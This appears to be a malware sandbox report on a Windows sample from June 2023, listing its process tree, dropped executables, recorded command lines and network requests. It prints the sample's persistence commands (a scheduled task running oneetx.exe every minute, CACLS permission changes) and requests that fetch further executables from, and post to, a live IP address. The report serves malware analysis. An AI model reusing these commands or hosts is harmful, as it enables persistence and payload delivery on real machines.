Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | June 12, 2023, 6:08 p.m. | June 12, 2023, 6:10 p.m. |
-
-
2a344302.exe "C:\Users\test22\AppData\Local\Temp\2a344302.exe"
2188 -
-
-
schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
2428 -
cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\207aa4515d" /P "test22:N"&&CACLS "..\207aa4515d" /P "test22:R" /E&&Exit
2492-
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2568 -
cacls.exe CACLS "oneetx.exe" /P "test22:N"
2604 -
cacls.exe CACLS "oneetx.exe" /P "test22:R" /E
2696 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2752 -
cacls.exe CACLS "..\207aa4515d" /P "test22:N"
2788 -
cacls.exe CACLS "..\207aa4515d" /P "test22:R" /E
2844
-
-
3eef203fb515bda85f514e168abb5973.exe "C:\Users\test22\AppData\Local\Temp\1000003001\3eef203fb515bda85f514e168abb5973.exe"
2180 -
setup.exe "C:\Users\test22\AppData\Local\Temp\1000004001\setup.exe"
2400 -
-
toolspub2.exe "C:\Users\test22\AppData\Local\Temp\1000005001\toolspub2.exe"
2508
-
-
-
-
-
explorer.exe C:\Windows\Explorer.EXE
1236
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
45.9.74.80 | Active | Moloch |
Suricata Alerts
Suricata TLS
No Suricata TLS
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://45.9.74.80/0bjdn2Z/index.php | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://45.9.74.80/3eef203fb515bda85f514e168abb5973.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://45.9.74.80/setup.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://45.9.74.80/toolspub2.exe |
request | POST http://45.9.74.80/0bjdn2Z/index.php |
request | GET http://45.9.74.80/3eef203fb515bda85f514e168abb5973.exe |
request | GET http://45.9.74.80/setup.exe |
request | GET http://45.9.74.80/toolspub2.exe |
request | POST http://45.9.74.80/0bjdn2Z/index.php |
file | C:\Users\test22\AppData\Local\Temp\2a344302.exe |
file | C:\Users\test22\AppData\Local\Temp\1000003001\3eef203fb515bda85f514e168abb5973.exe |
file | C:\Users\test22\AppData\Local\Temp\1000005001\toolspub2.exe |
file | C:\Users\test22\AppData\Local\Temp\ss41.exe |
file | C:\Users\test22\AppData\Local\Temp\newplayer.exe |
file | C:\Users\test22\AppData\Local\Temp\1000004001\setup.exe |
cmdline | "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\207aa4515d" /P "test22:N"&&CACLS "..\207aa4515d" /P "test22:R" /E&&Exit |
cmdline | "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" echo Y" |
cmdline | SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\207aa4515d\oneetx.exe" /F |
file | C:\Users\test22\AppData\Local\Temp\ss41.exe |
file | C:\Users\test22\AppData\Local\Temp\2a344302.exe |
file | C:\Users\test22\AppData\Local\Temp\newplayer.exe |
file | C:\Users\test22\AppData\Local\Temp\1000003001\3eef203fb515bda85f514e168abb5973.exe |
file | C:\Users\test22\AppData\Local\Temp\1000004001\setup.exe |
file | C:\Users\test22\AppData\Local\Temp\1000005001\toolspub2.exe |
file | C:\Users\test22\AppData\Local\Temp\1000005001\toolspub2.exe |
file | C:\Users\test22\AppData\Local\Temp\newplayer.exe |
file | C:\Users\test22\AppData\Local\Temp\1000003001\3eef203fb515bda85f514e168abb5973.exe |
file | C:\Users\test22\AppData\Local\Temp\1000004001\setup.exe |
file | C:\Users\test22\AppData\Local\Temp\2a344302.exe |